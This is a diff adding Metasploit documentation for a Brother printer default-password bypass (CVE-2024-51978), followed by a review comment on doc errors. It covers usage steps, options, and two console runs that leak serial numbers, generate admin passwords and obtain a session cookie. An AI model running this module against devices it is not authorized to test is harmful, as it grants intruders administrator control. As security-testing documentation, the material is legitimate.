|
| 1 | +## Vulnerable Application |
| 2 | + |
| 3 | +By leaking a target devices serial number, a remote attacker can generate the target devices default |
| 4 | +administrator password. The target device may leak its serial number via unauthenticated HTTP, HTTPS, IPP, |
| 5 | +SNMP, or PJL requests. |
| 6 | + |
| 7 | +## Testing |
| 8 | +Run the module against a vulnerable device (full list [here](https://www.cve.org/CVERecord?id=CVE-2024-51978)). |
| 9 | +If the default password is correctly generated, the module will be able to verify this. |
| 10 | + |
| 11 | +The module will also report an HTTP cookie `AuthCookie` which can be used, for example via Burp's proxy feature, to |
| 12 | +get access to an administrator session on the target devices web interface. |
| 13 | + |
| 14 | +## Verification Steps |
| 15 | + |
| 16 | +1. Start msfconsole |
| 17 | +2. `use auxiliary/admin/misc/brother_default_admin_auth_bypass_cve_2024_51978` |
| 18 | +3. `set RHOST <TARGET_IP_ADDRESS>` |
| 19 | +4. `run` |
| 20 | + |
| 21 | +## Options |
| 22 | + |
| 23 | +### TargetSerial |
| 24 | +A serial number to use for this target. If none is specified, the target will be queried via either HTTP, SNMP, or PJL |
| 25 | +to discover the serial number (as per the `DiscoverSerialVia` option). |
| 26 | + |
| 27 | +### DiscoverSerialVia |
| 28 | +The technique to use to discover the serial number. Can be one of `AUTO`, `HTTP`, `SNMP`, or `PJL`. The default is `AUTO`. |
| 29 | + |
| 30 | +### SaltLookupIndex |
| 31 | +The index into the salt table to use when generating the default password. The default is `254`, which is the expected |
| 32 | +value for Brother devices. |
| 33 | + |
| 34 | +### SaltData |
| 35 | +The salt data to use when generating the default password. By default, no salt data is required. |
| 36 | + |
| 37 | +### ValidatePassword |
| 38 | +Validate the default password by attempting to login. By default, this is set to `true`. |
| 39 | + |
| 40 | +## Scenarios |
| 41 | + |
| 42 | +_Note: In these example scenarios, the leaked serial numbers have been redacted with `***************`._ |
| 43 | + |
| 44 | +### MFC-L9570CDW |
| 45 | + |
| 46 | +In this example, the target `MFC-L9570CDW` device was running the latest firmware at the time of testing (June 20, 2025), |
| 47 | +whereby the `MAIN` version was `ZQ2503251054`, and the `SUB1` version was `1.35`. We can note that while the serial |
| 48 | +number could not be leaked via HTTPS (via CVE-2024-51977), we were able to leak the serial number via SNMP and then |
| 49 | +proceed to generate the correct default administrator password. The module validated that this password value is still |
| 50 | +the default administrator password for the device. |
| 51 | + |
| 52 | +``` |
| 53 | +msf6 auxiliary(admin/misc/brother_default_admin_auth_bypass_cve_2024_51978) > set VERBOSE true |
| 54 | +VERBOSE => true |
| 55 | +msf6 auxiliary(admin/misc/brother_default_admin_auth_bypass_cve_2024_51978) > set RHOSTS 192.168.86.62 |
| 56 | +RHOSTS => 192.168.86.62 |
| 57 | +msf6 auxiliary(admin/misc/brother_default_admin_auth_bypass_cve_2024_51978) > show options |
| 58 | +
|
| 59 | +Module options (auxiliary/admin/misc/brother_default_admin_auth_bypass_cve_2024_51978): |
| 60 | +
|
| 61 | + Name Current Setting Required Description |
| 62 | + ---- --------------- -------- ----------- |
| 63 | + COMMUNITY public yes SNMP Community String |
| 64 | + PJL_RPORT 9100 yes The target port number for PJL |
| 65 | + Proxies no A proxy chain of format type:host:port[,type:host:port][...]. Supported p |
| 66 | + roxies: sapni, socks4, socks5, socks5h, http |
| 67 | + RETRIES 1 yes SNMP Retries |
| 68 | + RHOSTS 192.168.86.62 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit |
| 69 | + /basics/using-metasploit.html |
| 70 | + RPORT 443 yes The target port (TCP) |
| 71 | + SNMP_OID_SERAILNO 1.3.6.1.2.1.43.5.1.1.17.1 yes The SNMP OID for the serial number |
| 72 | + SNMP_RPORT 161 yes The target port number for SNMP |
| 73 | + SSL true no Negotiate SSL/TLS for outgoing connections |
| 74 | + TARGETURI / yes The base URI path to the web admin console |
| 75 | + TIMEOUT 1 yes SNMP Timeout |
| 76 | + VERSION 1 yes SNMP Version <1/2c> |
| 77 | + VHOST no HTTP server virtual host |
| 78 | +
|
| 79 | +
|
| 80 | +View the full module info with the info, or info -d command. |
| 81 | +
|
| 82 | +msf6 auxiliary(admin/misc/brother_default_admin_auth_bypass_cve_2024_51978) > run |
| 83 | +[*] Running module against 192.168.86.62 |
| 84 | +[*] Attempting to leak serial number via HTTP |
| 85 | +[-] Unexpected HTTP response code: 302 |
| 86 | +[*] Attempting to leak serial number via SNMP |
| 87 | +[*] Leaked target serial number via SNMP: *************** |
| 88 | +[*] Generating default password with salt lookup index 254 and salt data 7HOLDhk' |
| 89 | +[*] Generated password value: r/5LM&U> |
| 90 | +[*] Attempting to validate password |
| 91 | +[*] Received an AuthCookie value: bi56MaYmMOhcwuH8miqCW5YvSGqKRqr8EOgiAr0yA20%3D |
| 92 | +[+] Successfully validated the administrator password: r/5LM&U> |
| 93 | +[*] Auxiliary module execution completed |
| 94 | +msf6 auxiliary(admin/misc/brother_default_admin_auth_bypass_cve_2024_51978) > |
| 95 | +``` |
| 96 | + |
| 97 | +### DCP-L2530DW |
| 98 | + |
| 99 | +In this example, the target `DCP-L2530DW` device was running the following firmware version, whereby the `MAIN` version |
| 100 | +was `ZC2403082049`, and the `SUB1` version was `1.04`. We can note that the serial number was successfully leaked via |
| 101 | +HTTPS (via CVE-2024-51977), however the password value generated was not the devices default password, so validation |
| 102 | +did not succeed. |
| 103 | + |
| 104 | +``` |
| 105 | +msf6 auxiliary(admin/misc/brother_default_admin_auth_bypass_cve_2024_51978) > set RHOSTS 192.168.86.3 |
| 106 | +RHOSTS => 192.168.86.3 |
| 107 | +msf6 auxiliary(admin/misc/brother_default_admin_auth_bypass_cve_2024_51978) > show options |
| 108 | +
|
| 109 | +Module options (auxiliary/admin/misc/brother_default_admin_auth_bypass_cve_2024_51978): |
| 110 | +
|
| 111 | + Name Current Setting Required Description |
| 112 | + ---- --------------- -------- ----------- |
| 113 | + COMMUNITY public yes SNMP Community String |
| 114 | + PJL_RPORT 9100 yes The target port number for PJL |
| 115 | + Proxies no A proxy chain of format type:host:port[,type:host:port][...]. Supported p |
| 116 | + roxies: sapni, socks4, socks5, socks5h, http |
| 117 | + RETRIES 1 yes SNMP Retries |
| 118 | + RHOSTS 192.168.86.3 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit |
| 119 | + /basics/using-metasploit.html |
| 120 | + RPORT 443 yes The target port (TCP) |
| 121 | + SNMP_OID_SERAILNO 1.3.6.1.2.1.43.5.1.1.17.1 yes The SNMP OID for the serial number |
| 122 | + SNMP_RPORT 161 yes The target port number for SNMP |
| 123 | + SSL true no Negotiate SSL/TLS for outgoing connections |
| 124 | + TARGETURI / yes The base URI path to the web admin console |
| 125 | + TIMEOUT 1 yes SNMP Timeout |
| 126 | + VERSION 1 yes SNMP Version <1/2c> |
| 127 | + VHOST no HTTP server virtual host |
| 128 | +
|
| 129 | +
|
| 130 | +View the full module info with the info, or info -d command. |
| 131 | +
|
| 132 | +msf6 auxiliary(admin/misc/brother_default_admin_auth_bypass_cve_2024_51978) > run |
| 133 | +[*] Running module against 192.168.86.3 |
| 134 | +[*] Attempting to leak serial number via HTTP |
| 135 | +[*] Leaked target serial number via HTTP: *************** |
| 136 | +[*] Generating default password with salt lookup index 254 and salt data 7HOLDhk' |
| 137 | +[*] Generated password value: pX-KDn3+ |
| 138 | +[*] Attempting to validate password |
| 139 | +[-] Failed to login with the administrator password: pX-KDn3+ |
| 140 | +[*] Auxiliary module execution completed |
| 141 | +msf6 auxiliary(admin/misc/brother_default_admin_auth_bypass_cve_2024_51978) > |
| 142 | +``` |
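Review bot: step 3 of the Verification Steps sets `RHOST`, but the option the module actually exposes (see the `show options` table and both scenario transcripts) is `RHOSTS`; change the step to `set RHOSTS <TARGET_IP_ADDRESS>` so a reader following the doc does not hit an unknown-option error. Two further points in the Options section: the `SaltData` text says "By default, no salt data is required", yet both runs log "salt data 7HOLDhk'", so the doc should state that a built-in default salt is used and that `SaltData` only overrides it; and `TargetSerial`, `DiscoverSerialVia`, `SaltLookupIndex`, `SaltData` and `ValidatePassword` do not appear in the `show options` output, so if they are advanced options the doc should say so and point the reader to `show advanced`. Finally, the option listed as `SNMP_OID_SERAILNO` looks like a misspelling of `SNMP_OID_SERIALNO`; if the name is wrong in the module it should be corrected there before this transcript is committed, since the doc will otherwise cement the typo. Minor wording: "target devices serial number" and "target devices web interface" should read "target device's".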